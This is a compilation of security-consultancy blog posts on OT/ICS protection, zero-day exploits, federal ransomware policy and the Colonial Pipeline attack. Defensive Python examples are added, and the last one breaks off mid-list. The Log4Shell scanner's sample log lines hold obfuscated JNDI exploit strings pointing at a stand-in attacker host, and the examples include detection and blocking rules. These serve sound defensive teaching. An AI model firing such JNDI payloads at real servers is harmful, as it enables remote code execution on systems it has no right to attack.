How to Protect Your Operational Technology (OT) in 2023


Oil and gas, manufacturing, energy distribution and critical infrastructure – what do all these industries have in common? Aside from their indispensability, they all rely on operational technology (OT) such as industrial control systems (ICS) and supervisory control and data acquisition (SCADA) devices.  

Collectively, these technologies control the world we live in, and OT-directed attacks can have a devastating impact. In contrast to traditional information technology (IT) attacks, these cyber-physical attacks affect machinery and processes with real-world consequences for the industries and people they serve.

In 2021, we were reminded of this fact by the Colonial Pipeline attack, which nearly crippled fuel supplies across the Eastern U.S. More recently, 9 out of 10 organizations reported that cyberattacks impacted their production or energy supplies within the last 12 months, with 56% seeing disruption lasting 4 days or longer.

Thanks to a combination of factors, OT-directed attacks – and traditional cyberattacks that impact OT systems – are steadily increasing, with government agencies increasingly taking notice. But why is this happening and how can you protect yourself in 2023? In this article, we’ll answer both questions. 

OT Security Trends 

OT threats have been on the rise for years, and while the factors behind this rise have largely remained consistent, they are being accelerated by larger trends affecting the IT landscape and business world in 2023.

1. OT Talent Gap

With the need for cybersecurity talent growing faster than the supply, ISC2 reported that global organizations were facing 3.4 million unfilled cyber positions in 2022.  

This gap continues to impact OT worse than other fields, as OT environments are filled with a combination of specialized and legacy systems. According to one expert, there were fewer than 1,000 ICS cybersecurity experts around the world only five years ago, and improvements have not kept pace with OT threats.

2. Supply Chain Issues Driving IT/OT Convergence

IT and OT have been converging for long enough that SANS Institute recommended dropping the IT/OT nomenclature several years ago: today’s industrial environments are dependent on IT infrastructure, which makes OT systems vulnerable to IT-directed attacks.  

With continued supply chain issues and an economic downturn projected for 2023, organizations are being pushed to maximize efficiency, meaning an influx of industrial IoT (IIoT), cloud apps and other Internet-facing surfaces that expand the attack surface around OT.

3. Geopolitical Conflict

Given the critical role that OT plays in supporting national industry and infrastructure, it is a common target for nation-state actors and politically motivated advanced persistent threat (APT) groups.

According to one study, hacking and reconnaissance against government bodies accounted for 48% of Internet traffic monitored across all public-sector organizations in 2022. As geopolitical conflict increases around the world, politically motivated cyberattacks of all types can be expected to rise even higher.

4. OT-Directed Attacks

In the past, OT threats have tracked IT threats closely, with many OT security incidents occurring as a side effect of malware or traditional cyberattacks. Now, threat actors are increasingly optimizing their attacks for ICS and SCADA devices, including systems from specific manufacturers.  

In April 2022, the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory with the Department of Energy, NSA and FBI warning that APT groups had developed a malicious ICS attack framework known as “PIPEDREAM” (also tracked as INCONTROLLER), with modules tailored to specific PLC families and OPC UA servers found throughout OT environments.

The Impact of OT Threats 

Attacks on control systems can accomplish many things, none of them good. Limiting the scope to risks that directly impact an organization, they include:

  • Data theft – exposing operationally significant data to intruders and leaking proprietary information like intellectual property. 
  • Operational disruption – leading infrastructure to function improperly or even shut down. This may cause significant risk to human life and safety within operating facilities. 
  • Financial loss – with the rise of ICS ransomware, an OT attack can directly rob an organization. Beyond that, the cost to remediate any incident may be high, and extended periods of disruption can cause a loss in revenue. 

Beyond an organization’s people and bottom line, it goes without saying that OT systems control a nation’s infrastructure, meaning that any security incident can potentially change millions of lives for the worse.

Protecting Your OT Systems 

Faced with the prospect of cyberattacks on critical infrastructure, the government is focusing more attention on OT than ever before. It is only a matter of time before businesses – particularly government contractors – are required to follow regulations to protect their OT systems. But there’s no reason they can’t start now.

1. Adopt ICS Security Frameworks

With IT-directed attacks still accounting for a large number of OT threat incidents, securing your IT estate and network perimeter is a first step towards protecting OT. Organizations can start by aligning with standards like the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF), supplemented by NIST SP 800-82, its guide to OT security.

They can also implement guidelines developed specifically for industrial environments, such as the North American Electric Reliability Corporation (NERC) Critical Infrastructure Protection (CIP) standards for the electric sector, or the ISA/IEC 62443 series for industrial automation and control systems generally.

2. Treat OT as a Separate Domain

Despite IT and OT convergence, organizations are increasingly shifting the primary responsibility for OT security from IT managers to OT operators. As a SANS Institute survey reports: “organizations are realizing the enterprise IT and ICS/OT environments are not the same. They not only have different types of systems, but also have technologies that are not directly cross-compatible.”  

Ultimately, increased communication between IT and OT professionals can help to bridge knowledge gaps. When a disruption occurs, 72% of cybersecurity professionals surveyed could not tell whether it originated in IT or OT; professionals with combined IT and OT expertise are far better placed to make that call, and to respond correctly.

3. Promote More Secure Authentication

Poor identity management and authentication practices – such as weak or shared passwords, vendor default credentials and a lack of multi-factor authentication (MFA) – continue to threaten systems within an OT environment and on its periphery.

Now more than ever, it’s vital for organizations to educate their employees on the importance of strong, unique passwords, and to configure applications with their most secure settings, which may include MFA and support for biometrics. Many OT devices cannot support MFA themselves, so enforce it at the points that front them: VPN concentrators, jump hosts and remote-access gateways. Remove or rotate default and shared credentials on the devices themselves.

4. Develop an Incident Response Strategy

In the event of a successful OT attack, organizations can mitigate harm significantly by developing a robust incident response strategy. In summary, the plan should include steps to:

    • Isolate the affected systems to prevent further harm where it is safe to do so. In OT, confirm with plant operators that disconnecting or stopping a system will not create an unsafe process state before you act; then identify the threat source and remove it.
    • Record and document the attack as it unfolds, preserving logs and evidence for later analysis and review.
    • Reduce harm by resetting credentials on affected systems and reviewing user accounts for unauthorized changes.
    • Inform stakeholders and implement measures to prevent future incidents.

During an attack, every second counts, and knowing what to do ahead of time can make a world of difference. For more detail, check out our blog post on disaster recovery and response. Additionally, consider joining industry organizations such as Incident Command System for Industrial Control Systems (ICS4ICS), which focuses on an OT-based emergency management framework.

The Need for Expertise 

When it comes to defending against OT attacks, no method of security is more reliable than proactive risk management, threat hunting and vulnerability assessment conducted by experts at the intersection between IT and OT. 

Unfortunately, experts are hard to come by, especially for ICS, SCADA, programmable logic controllers (PLCs) and other OT systems. Fortunately, many are employed by Securicon. With years of experience with critical infrastructure – and the ability to implement NERC CIP guidelines – no one is better equipped to find vulnerabilities and promote safety in modern OT systems. To learn more, contact us today.

Seven Ways to Reduce the Impact of Zero-Day Exploits


At the end of 2021, the Log4Shell remote code execution (RCE) vulnerability (CVE-2021-44228) was discovered in Log4j, a popular Java logging package. With millions of devices and software packages affected, it became the worst cybersecurity event since the SolarWinds supply-chain attack, with exploitation continuing into the early months of 2022.

Log4Shell is an example of a zero-day exploit: a zero-day is a vulnerability that attackers exploit before the vendor has released a fix, and often before the vendor knows it exists. The term “zero-day” refers to the number of days organizations and cyber defenders have had to prepare – zero.
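As an added example (not from the original post), the detection logic below scans web server access logs for the JNDI lookup string that a vulnerable Log4j would evaluate. Attackers obfuscated the string to dodge naive matching, so the scanner first URL-decodes the line and then collapses nested ${lower:…}, ${upper:…} and ${x:-y} lookups from the inside out. The log lines are constructed for this example; the 198.51.100.7 attacker address is a documentation-range placeholder.

```python
"""Flag Log4Shell (CVE-2021-44228) exploitation attempts in web server logs.

Added example, not part of the original post. It is detection logic only:
it looks for the ${jndi:...} lookup a vulnerable Log4j would evaluate, after
undoing the obfuscations attackers used to dodge naive string matching
(URL encoding, nested ${lower:..}/${upper:..} lookups and ${x:-y} defaults).
The log lines below are constructed for this example.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Innermost lookups that resolve to literal text:
#   ${lower:J} -> j     ${upper:n} -> N     ${::-d} -> d     ${env:NOPE:-i} -> i
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup itself, with the protocols Log4j's JNDI manager will follow.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def unwrap_lookups(text: str) -> str:
    """Collapse nested lookups from the inside out until none remain."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """Return (protocol, decoded line) when the line carries a JNDI lookup."""
    decoded = unwrap_lookups(unquote(line))
    m = _JNDI.search(decoded)
    if not m:
        return None
    return m.group(1).lower(), decoded


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, protocol) for every line that carries a lookup."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, found[0]))
    return hits


# Constructed access-log lines: one benign, three attack variants, one false-positive bait.
LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${${lower:j}${::-n}${env:NaN:-d}i:${lower:rmi}://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:12 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.3 - - [10/Dec/2021:10:01:15 +0000] "GET /docs/${project.version} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, proto in scan(LOGS):
        print(f"line {idx}: JNDI lookup via {proto}")
```

The last sample line shows why the scanner keys on the jndi: prefix rather than on any ${…} string: build tooling and templating engines leave harmless lookups in URLs all the time. Run it against a day of access logs and treat any hit as an exploitation attempt, whether or not the target was vulnerable.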

As cyber actors increase in sophistication, the number of zero-day exploits is increasing every year. In 2021, Mandiant found that the number of zero-days exploited in the wild had more than doubled since 2019. In this article, we’ll explain where zero-days are most likely to originate, and how businesses can protect themselves from harm.

Common Types of Zero-Days

Zero-days are not confined to one class of software: any Internet-connected, programmable surface can carry one, and the most dangerous give a remote attacker code execution on the device or application. Today, common targets include:

  • Third-Party Software – third-party applications are frequently built on top of dependencies that can suffer from zero-day exploits. Log4Shell was in Log4j, a library from the Apache Logging Services project, so millions of applications that bundle it as a dependency were impacted.
  • Web Browsers – Internet users spend up to 6 hours of their day online, which makes web browsers like Edge, Chrome and Firefox common targets for malicious actors seeking zero-day exploits. In 2022 alone, Google has patched seven zero-days in the Chrome browser.
  • Mobile Operating Systems – compromised mobile devices are a rich source of sensitive data, which makes them a major target for nation-state actors. Zero-day exploits often surface in iOS, Android and other mobile operating systems; worse, they can go undiscovered for years before they are patched.
  • Network Edge Devices – routers, switches, firewalls and VPN appliances regularly fall victim to zero-days that let attackers bypass authentication or pass through the perimeter. In 2018, 83% of home and enterprise routers were found to have publicly known vulnerabilities, and today these edge devices are a favorite initial-access target for ransomware groups.

As organizations grow more reliant on information technology (IT), the threat of zero day exploits will continue to rise – the average business deploys over 100 software-as-a-service (SaaS) apps, and at least as many connected devices. Now more than ever, businesses need to take preventive steps to protect themselves from vulnerabilities.

Reducing the Impact of Zero-Day Exploits

The danger of a zero-day exploit is exacerbated by the fact that, at first, there is no Common Vulnerabilities and Exposures (CVE) entry and no attack signature for defenders to match against. Fortunately, there are ways to reduce the likelihood of a zero-day exploit succeeding and to increase your attack preparedness.

  1. Threat Detection Systems – aside from basic cyber defenses such as firewalls and anti-virus, organizations should adopt real-time protection in the form of an inline intrusion prevention system (IPS). Anomaly- and behavior-based detection can flag signs of intrusion (unusual traffic patterns, unexpected process behavior) even when no signature exists for the specific exploit, alerting your team when a zero-day is used.
  2. Egress Filtering – while filtering inbound traffic is crucial, filtering outbound traffic is equally important. Egress filtering, implemented on a firewall or IPS, lets network admins stop compromised hosts from reaching attacker infrastructure: default-deny outbound traffic, allow only the destinations, ports and protocols the business needs, and force DNS through internal resolvers.
  3. Network Visibility – security teams often have limited visibility into the devices and applications that are operating across their networks. Bringing this fragmented knowledge together is essential for securing your network from exploits: keep an inventory of every device, whether IT, IoT or OT, classify it, and continually monitor for configuration changes.
  4. Device Oversight – devices – including routers, switches, laptops and mobile phones – typically receive regular updates that patch zero-days once they are discovered by security researchers. Organizations should maintain an up-to-date inventory of all the devices connected to their network, set update policies, and replace devices that are no longer supported by the manufacturer.
  5. Third-Party Vendor Management – while no vendor can guarantee that their devices or software products won’t fall prey to a zero-day exploit, some vendors are more security conscious than others. Take inventory of your software supply chain, and research all your technology partners to ensure they are applying adequate security controls.
  6. Adopt a Zero-Trust Paradigm – when malicious actors compromise your network through a zero-day exploit, they will try to move laterally to other systems. A zero-trust security paradigm can stop them in the process by applying the principle of least privilege, and continually verifying a user’s identity as they switch between devices and applications.
  7. Vulnerability Assessment – vulnerability assessments and penetration tests can help you to better document your IT infrastructure and remediate security gaps that increase the impact of zero-day exploits.

While there’s no way to eliminate the chance of a zero-day exploit altogether, developing a strong cybersecurity program can give your business the tools it needs to close cybersecurity gaps, eliminate risky vendors, and respond quickly in a disaster.
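To make the egress-filtering item concrete, here is an added example (not from the original post) of a default-deny egress policy applied to firewall log lines in the iptables LOG target format. The internal ranges, the OT zone, the sanctioned NTP server, the blocklist entry and the policy rules are all assumptions for this example, and the log lines are constructed; in production the same decisions would live in the firewall ruleset, and this kind of check is how you audit what the ruleset actually let through.

```python
"""Evaluate outbound flows against a default-deny egress policy.

Added example, not part of the original post: a small policy engine applied
to iptables-style LOG lines (SRC= DST= PROTO= DPT= fields). The networks,
the allowlists and the policy itself are assumptions for this example.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

INTERNAL = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
OT_ZONE = ipaddress.ip_network("10.10.0.0/16")            # plant floor: never talks to the Internet
NTP_ALLOW = {ipaddress.ip_address("203.0.113.123")}       # the one external NTP source we sanction
KNOWN_BAD = {ipaddress.ip_address("198.51.100.7")}        # threat-intel / Tor exit feed entry (constructed)
WEB_PORTS = {80, 443}

_FIELD = re.compile(r"(\w+)=(\S+)")


def parse_log(line: str) -> Dict[str, str]:
    """Turn 'SRC=... DST=... PROTO=... DPT=...' into a field dict."""
    return dict(_FIELD.findall(line))


def is_internal(ip) -> bool:
    return any(ip in net for net in INTERNAL)


def judge(fields: Dict[str, str]) -> Tuple[str, str]:
    """Return (verdict, reason); verdict is allow, deny or ignore (not egress)."""
    src = ipaddress.ip_address(fields["SRC"])
    dst = ipaddress.ip_address(fields["DST"])
    proto = fields.get("PROTO", "").upper()
    dport = int(fields.get("DPT", "0"))
    if not is_internal(src) or is_internal(dst):
        return "ignore", "not an egress flow"
    if dst in KNOWN_BAD:
        return "deny", "destination on blocklist"
    if src in OT_ZONE:
        return "deny", "OT zone has no Internet egress"
    if proto == "UDP" and dport == 53:
        return "deny", "DNS must use internal resolvers"   # blocks rogue resolvers and DNS tunnelling
    if proto == "UDP" and dport == 123:
        return ("allow", "sanctioned NTP") if dst in NTP_ALLOW else ("deny", "unsanctioned NTP")
    if proto == "TCP" and dport in WEB_PORTS:
        return "allow", "web"
    return "deny", "not on egress allowlist"                # SMB, RDP, Telnet, C2 on odd ports...


def violations(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(src, dst, reason) for every logged egress flow the policy denies."""
    out = []
    for line in lines:
        f = parse_log(line)
        verdict, reason = judge(f)
        if verdict == "deny":
            out.append((f["SRC"], f["DST"], reason))
    return out


# Constructed log lines in the iptables LOG target format.
LOGS = [
    "kernel: EGRESS IN=eth0 OUT=eth1 SRC=10.0.1.20 DST=203.0.113.10 PROTO=TCP SPT=51234 DPT=443",
    "kernel: EGRESS IN=eth0 OUT=eth1 SRC=10.0.1.20 DST=203.0.113.20 PROTO=TCP SPT=51235 DPT=445",
    "kernel: EGRESS IN=eth0 OUT=eth1 SRC=10.0.1.31 DST=198.51.100.7 PROTO=TCP SPT=40001 DPT=443",
    "kernel: EGRESS IN=eth0 OUT=eth1 SRC=10.0.1.31 DST=203.0.113.53 PROTO=UDP SPT=40002 DPT=53",
    "kernel: EGRESS IN=eth0 OUT=eth1 SRC=10.10.5.2 DST=203.0.113.10 PROTO=TCP SPT=40003 DPT=443",
    "kernel: EGRESS IN=eth0 OUT=eth1 SRC=10.0.1.40 DST=203.0.113.123 PROTO=UDP SPT=123 DPT=123",
    "kernel: EGRESS IN=eth1 OUT=eth0 SRC=203.0.113.10 DST=10.0.1.20 PROTO=TCP SPT=443 DPT=51234",
]

if __name__ == "__main__":
    for src, dst, why in violations(LOGS):
        print(f"DENY {src} -> {dst}: {why}")
```

The order of the rules matters: the blocklist and the OT-zone rule come before any allow, so a plant-floor host talking HTTPS to a blocklisted address is denied for the most specific reason. The final line of judge is the whole point of egress filtering: anything not explicitly needed, including outbound SMB on 445, is denied by default rather than allowed by omission.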

Partner With Cybersecurity Veterans

In today’s perilous cyber landscape, organizations need expert cybersecurity consultants to help them find and identify risks to their mission-critical assets. But with a worldwide shortage of cyber talent, finding experts has become increasingly difficult – fortunately, Securicon is here to help.

With a team comprised of veterans from the U.S. security community – including DoD, DHS and U.S. Cyber Command – we are equipped to prepare your organization for the worst, from gap analysis to compliance consulting, assessment support and audit preparation. To learn more, contact us today.

What the Federal Government is Doing to Fight Ransomware in 2022


Among the cybersecurity threats that are escalating in 2022, ransomware attacks remain one of the most damaging and impactful to federal agencies and contractors. According to Verizon’s yearly Data Breach Investigation Report (DBIR), this year has seen ransomware incidents increase by 13%, which is more growth than the past 5 years combined.

The cost of ransomware is high, with many cyber actors embracing a double extortion model – encrypting data while also threatening to leak stolen copies, so that even a victim with good backups has reason to pay – but cost is far from the biggest concern for the U.S. government. Foreign adversaries – including China, North Korea, and Russia – are increasingly using ransomware against organizations in the West: sometimes, they even work together.

Government Initiatives and New Security Burdens

With all that being said, ransomware is a risk that organizations in the public and private sectors should be worried about: not only is it capable of driving businesses into bankruptcy, but it also represents a national security threat that can cripple critical infrastructure and expose classified information to nation state actors.

Fortunately, 2022 has also brought multiple initiatives across agencies and branches of the U.S government which will help curb the incidence of ransomware and keep businesses safe for years to come. Some will also impose new security burdens which government contractors will have to apply if they want to stay compliant.

In this blog post, we will share five recent developments in legislation and policy while explaining their implications for ransomware and compliance.

1.  New Cyber Reporting Requirements

In the aftermath of a cyber incident or data breach, organizations have an ethical responsibility to inform their customers – sadly, that doesn’t always happen in a timely matter. But when a ransomware attack occurs against critical infrastructure, public safety is at stake, and rapid disclosure is all the more urgent.

In March, the ‘Cyber Incident Reporting for Critical Infrastructure Act of 2022’ [1] (CIRCIA) was signed into law. Under CIRCIA, covered critical infrastructure entities will be required to report substantial cybersecurity incidents to CISA within 72 hours, and any ransom payments within 24 hours, once CISA’s implementing rule takes effect. While the precise scope of covered entities remains to be determined, it will likely include sectors like:

      • Critical Manufacturing
      • Financial Services
      • Energy
      • The Defense Industrial Base (DIB)

Ultimately, the new cyber reporting requirements will help law enforcement agencies to gather intelligence on attack patterns, track the activity of advanced persistent threat (APT) groups and respond to cyber emergencies in a timely way.

[1] The official source for CIRCIA is the Consolidated Appropriations Act of 2022; for readers’ convenience, the PDF linked above contains only the portions of the Act which comprise CIRCIA.

2.  The Joint Ransomware Task Force

Within the text of CIRCIA, legislators directed the formation of a ransomware task force, which was formally announced by Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly on May 20, 2022.

The task force – which aims to combine cybersecurity initiatives across multiple U.S agencies – will be co-headed by the Federal Bureau of Investigation (FBI), allowing law enforcement to collaborate with CISA more effectively.

Today, government agencies suffer from entrenched barriers to information sharing that hinder cybersecurity efforts. Better collaboration will be a major boon, allowing agencies to share and react to intelligence more quickly while building attack profiles that will help businesses to defend themselves against advanced ransomware strains that evade popular detection methods.

3.  CMMC 2.0 and Updated CMMC Timeline

Following the release of Cybersecurity Maturity Model Certification (CMMC) 2.0, the Department of Defense (DoD) is now working with federal policymakers on an implementation timeline that could see CMMC enforced on DoD contracts by May of 2023.

CMMC 2.0 seeks to protect controlled unclassified information (CUI) by requiring federal contractors to demonstrate cybersecurity compliance before they can be eligible for most Defense contracts. For less sensitive “Level 1” contracts, the DoD will accept an annual self-assessment; most “Level 2” contracts will require assessment by an accredited third-party organization; and for the most sensitive “Level 3” contracts, organizations will need a government-led assessment.

By enforcing cybersecurity controls proportional to the sensitivity of each contract, CMMC 2.0 will not only encourage better security throughout the DIB – it will also ensure that the most sensitive CUI is only shared with contractors who are ready to defend it against a variety of threats, including ransomware.

4.  Zero-Trust Legislation and Implementation

In 2021, the ‘Executive Order on Improving the Nation’s Cybersecurity’ instructed federal agencies to adopt zero-trust security models to defend their IT infrastructure. Shortly afterwards, CISA published a zero-trust maturity model (ZTMM) and the Office of Management and Budget issued a federal zero-trust strategy (M-22-09) to help agencies comply with the executive order.

The road ahead is difficult, especially with many federal organizations still relying on outdated, legacy IT architecture. But zero-trust adoption is well underway, and – difficulties notwithstanding – 6 out of 10 federal IT officials believe their agencies will be able to meet the challenge. More than 75% say they already have some form of zero-trust security policy in place.

From the perspective of reducing ransomware attacks, this is good news: zero-trust architecture won’t render organizations invulnerable to cyberattacks, but it will bring about significant transformation by forcing organizations to continually validate user identities, monitor apps, and accelerate modernization.

Most importantly – with zero-trust in place – it won’t be enough for ransomware actors to “get past the door”: they will be faced with multiple barriers to lateral movement and penetration that will halt many in their tracks.

5.  Updates to NIST’s Cybersecurity Framework (CSF)

The National Institute of Standards and Technology (NIST) is updating its Cybersecurity Framework (CSF), a set of guidelines that has shaped cybersecurity efforts in both the public and private sectors since it was first issued in 2014. In February of this year, NIST requested comments for an upcoming update to CSF, prompting an outpouring of responses from industry experts.

Recently, DoD sources have stated that they want better risk-management guidance in the next version of the CSF, aligning it with another NIST publication, Special Publication (SP) 800-30, ‘Guide for Conducting Risk Assessments’. Aligning the two NIST resources would help organizations currently following CSF to develop a better understanding of risk and of the risk factors that lead to data breaches, ransomware attacks, and more.

Whether NIST implements this advice or not, an update to CSF could not come at a better time – cyber tactics have developed rapidly since the last update was released in 2018, and organizations are in need of guidance. According to the agency, a majority of respondents to its request for comment stated they find CSF to be a “useful model for organizations seeking to identify, assess, address, and manage cybersecurity risk” – it can only remain useful as long as it remains up to date with leading risk sources.

Cyber Expertise to Help You Stay Compliant

Compliance with federal cybersecurity standards and laws is non-negotiable for any business in the federal space, and a very good idea for businesses outside it. But as the cyber landscape changes, protecting revenue and customers demands a steadily rising cybersecurity baseline that can be hard to meet without guidance.

Securicon helps your business to comply with federal and regulatory requirements through program and risk assessments. With a team comprised of veterans from the U.S. security community – including DoD, DHS, and U.S. Cyber Command – we are equipped to provide organizations with gap analysis, compliance consulting, assessment support, and audit preparation. To learn more, contact us today.

Right-of-Breach Mentality Leads to Cyberattacks on Critical Infrastructure

The dust is still settling from the latest in a series of highly publicized cyberattacks affecting critical infrastructure in the U.S. Two Fridays ago, on May 7, Colonial Pipeline – operator of the largest refined-products pipeline system in the U.S. – experienced a ransomware attack and announced that it was shutting down all 5,500 miles of its main pipeline, running from Houston, TX to Linden, NJ.

The news prompted a fearful response from consumers. Because Colonial Pipeline supplies roughly 45% of the East Coast’s gasoline, jet fuel and diesel, prices soared above $3.00 a gallon in some places, and gas stations experienced shortages as customers lined up to buy as much as they could. Since then, the pipeline has resumed operations and the cost of gas has slowly gone back down.

In retrospect, things could have been much worse.

According to Colonial Pipeline, the cyberattack affected its business networks rather than the industrial control systems connected to its delivery infrastructure. And thanks to a reserve supply, wholesalers serving retail customers did not report any shortages before the pipeline resumed operation. Even so, this incident serves as a stark reminder of the cyber war that is unfolding all around us and the risk it poses to national security.

Ransomware Attacks on the Rise

In August of 2020, CISA warned of a rise in cyberattacks against critical infrastructure and advised operators to take immediate action. Since then, their predictions have materialized in at least two major security incidents: the SolarWinds breach disclosed in December 2020 and the breach of a Florida water treatment facility in February 2021. According to one source, ransomware attacks rose by 62% in 2020, with ransom demands rising 225%.

Why is this happening? For one thing, bad actors are becoming more sophisticated. According to analysts, the Colonial Pipeline attack was an instance of “ransomware-as-a-service”: DarkSide – the Russia-based group that claimed responsibility for the incident – provides its malware and infrastructure to affiliates and helps with execution in exchange for a cut of the ransom.

But more importantly, organizations are not applying CISA’s recommendations until it is too late. They aren’t taking inventory of their assets, implementing a robust cybersecurity plan or enforcing access rules that would prevent a majority of attacks from succeeding.

Right of Breach Mentality

While the initial access vector for the Colonial Pipeline attack has not yet been disclosed, recent high-profile security breaches have followed from notoriously bad cybersecurity practices. For instance, a SolarWinds update server was reportedly protected by the weak password “solarwinds123”; meanwhile, the Florida water facility relied on remote-access software with a shared password and no multi-factor authentication.

But this does not prove that organizations are incapable of better cybersecurity practices. According to a study from Ponemon Institute, companies that experience a security breach are 26% less likely to experience another breach in the future. This research confirms what we already know: organizations react “right of breach,” waiting for the worst to happen before they act to prevent it.

Until then, they cut corners on regulations in dozens of tiny ways that add up to a weak overall cybersecurity posture, from skipping multi-factor authentication to creating loopholes in their own remote access rules. Many assume they are too big and sophisticated to fail, while others assume they are too small to fall under an attacker’s radar. Both are mistaken.

Nobody is Safe

In 2020, 1,600 security breaches were reported to the North Carolina Department of Justice, and most of them were not large enough to make any headlines. During the SolarWinds attack, over 18,000 organizations installed the trojanized update, and SolarWinds’ customers included 425 companies on the Fortune 500 list; the attackers then chose a much smaller set of those organizations for hands-on intrusion. Victims ranged from federal, state and local governments to critical infrastructure entities and small businesses.

Today, there is a bad actor for every organization, and all are looking for a niche. Some are motivated by geopolitics, and some are in it for the money. Others are simply agents of chaos looking for any opportunity to cause destruction. At the end of the day, every organization will eventually fall victim to a cyberattack: it is not a matter of “if,” but “when.”

These organizations should take the threat of a breach seriously for the good of their customers, shareholders and employees. Federal contractors and critical infrastructure entities have an additional burden: they must do it to protect national security and the American way of life.

Preparing for Ransomware Attacks: CISA’s Advice

Following the Colonial Pipeline breach, CISA has once again issued a warning to critical infrastructure operators in publication AA21-131A, titled: ‘Best Practices for Preventing Business Disruption from Ransomware Attacks’. In the following paragraphs, we summarize the most important recommendations:

Reducing the Risk of a Breach

Organizations can reduce the likelihood of a successful ransomware attack by applying security controls that protect against common attack vectors.

  • Prepare for phishing attacks – phishing and spearphishing remain among the most common ways attackers gain initial access. Train your employees to recognize and report malicious emails through simulated attacks; enable strong spam filters to prevent phishing emails from reaching them.
  • Protect against bad connections – block traffic from known bad IP addresses, and protect against malicious entry attempts by restricting remote desktop protocol (RDP) access to known sources behind a VPN with multi-factor authentication. Additionally, block traffic from Tor exit nodes and other anonymization services.
  • Prevent unauthorized execution – prevent unauthorized programs from running on organization computers by disabling macros in Microsoft Office files, especially those received from the Internet; use application allowlisting so only trusted apps and their dependencies can run.

Protecting Business Functions

Should a ransomware attack occur, the following protections and redundancies will ensure that critical business functions can continue.

  • Segment IT/OT networks – regulate communication between operational technology (OT) and information technology (IT); minimize network connectivity to industrial control systems (ICS) and Supervisory control and data acquisition (SCADA) devices.
  • Prepare for manual control – ensure you can switch to manual operation if necessary. Identify the OT and IT interdependencies your processes rely on and develop workarounds for losing them in a cyberattack; conduct exercises to test manual controls on a regular basis.
  • Conduct regular backups – regularly back up system data and store it separately from the rest of your network. Create backup images of critical systems so they can be rebuilt from scratch if necessary.
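The “restrict RDP” and “segment IT/OT networks” recommendations above both come down to a zone policy: which sources may talk to which zones, and on which ports. The added example below (not part of the CISA advisory or this post) checks flow records against a Purdue-style policy with three internal zones plus the Internet. The zones, addresses, jump host, VPN egress range, Tor exit entry, port list and the rules themselves are assumptions for illustration, and the flows are constructed; the structure is what carries over to a real firewall audit.

```python
"""Check flows against a Purdue-style zone policy for IT/OT segmentation.

Added example, not from the CISA advisory or the original post. Zones,
addresses, ports and rules are assumptions for illustration.
"""
import ipaddress
from typing import List, Tuple

ZONES = {
    "enterprise": ipaddress.ip_network("10.0.0.0/16"),
    "dmz":        ipaddress.ip_network("10.1.0.0/24"),   # jump hosts, historian replica
    "control":    ipaddress.ip_network("10.10.0.0/16"),  # PLCs, HMIs, engineering workstations
}
JUMP_HOSTS = {ipaddress.ip_address("10.1.0.10")}                 # the only hosts allowed into control
VPN_ADMIN_SOURCES = [ipaddress.ip_network("203.0.113.0/28")]      # corporate VPN egress (assumed)
TOR_EXITS = {ipaddress.ip_address("198.51.100.7")}                # constructed blocklist entry
ICS_PORTS = {502: "Modbus/TCP", 102: "S7comm", 20000: "DNP3", 44818: "EtherNet/IP", 4840: "OPC UA"}

Flow = Tuple[str, str, str, int]   # (src, dst, proto, dport)


def zone_of(ip) -> str:
    for name, net in ZONES.items():
        if ip in net:
            return name
    return "internet"


def check(src: str, dst: str, proto: str, dport: int) -> Tuple[bool, str]:
    """Return (permitted, reason) for one flow under the zone policy."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    sz, dz = zone_of(s), zone_of(d)
    if s in TOR_EXITS or d in TOR_EXITS:
        return False, "Tor exit node"
    # Industrial protocols never leave the control zone, not even from the jump host.
    if dport in ICS_PORTS and not (sz == "control" and dz == "control"):
        return False, f"{ICS_PORTS[dport]} outside control zone"
    # Only DMZ jump hosts may initiate connections into the control zone.
    if dz == "control" and sz != "control":
        if sz == "dmz" and s in JUMP_HOSTS:
            return True, "jump host to control"
        return False, f"{sz} -> control not via jump host"
    if sz == "control" and dz == "internet":
        return False, "control zone to Internet"
    # RDP from outside is only acceptable from the VPN concentrator's egress range.
    if dport == 3389 and sz == "internet":
        if any(s in net for net in VPN_ADMIN_SOURCES):
            return True, "RDP from VPN"
        return False, "RDP from Internet"
    return True, "permitted"


def check_flows(flows: List[Flow]) -> List[Tuple[Flow, str]]:
    """Return every flow the policy rejects, with the reason."""
    rejected = []
    for flow in flows:
        ok, reason = check(*flow)
        if not ok:
            rejected.append((flow, reason))
    return rejected


# Constructed flows, e.g. from NetFlow or a firewall's connection log.
FLOWS: List[Flow] = [
    ("10.0.5.20", "10.10.1.5", "TCP", 502),        # enterprise laptop polling a PLC directly
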